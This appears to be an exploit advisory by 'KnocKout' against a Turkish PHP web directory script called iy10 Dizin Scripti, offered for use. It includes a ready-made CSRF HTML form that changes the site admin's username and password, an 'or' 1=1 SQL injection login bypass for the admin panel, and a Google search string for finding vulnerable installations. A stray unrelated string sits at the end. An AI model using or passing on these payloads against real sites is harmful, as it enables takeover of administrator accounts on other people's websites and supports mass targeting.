.______________ ||__/||_____\ _\_______ ____ ||\/ ||\\///_\\___ \_/ __ \ | Y\/^ /><\\_/ \| \/\___/ |___|/\____ |/__/\_ \\_____/__|\___> \/|__|\/\/\/ _____________________________ / _____/\_ _____/\_ ___ \ \_____\|__)_ /\\/ /\ |\\ \____ /_______//_______/ \______/ \/ \/ \/ iy10 Dizin Scripti => Multiple Vulnerabilities (CSRF & Authentication Bypass) ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Şeker Insanlar :ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon KedAns-Dz, b3mb4m ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : iy10 Dizin Scripti |~Affected Version : All Version |~Software: http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html |~RISK : High |~Google Keyword :"Sitenizi dizine eklemek için tıklayın !" ################## ++ CSRF Admin Password Change Exploit ++ ###################################### <html> <body> <form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST"> <input type="hidden" name="kullaniciadi" value="knockout" /> <input type="hidden" name="sifre" value="password" /> <input type="hidden" name="Submit" value="Exploit!" /> <input type="submit" value="Submit request" /> </form> </body> </html> ################# ++ SQL Injection with Authentication Bypass ++########################################### http://[TARGET]/admin ID: 'or' 1=1 PW : 'or' 1=1 ############################################################
体验盒子
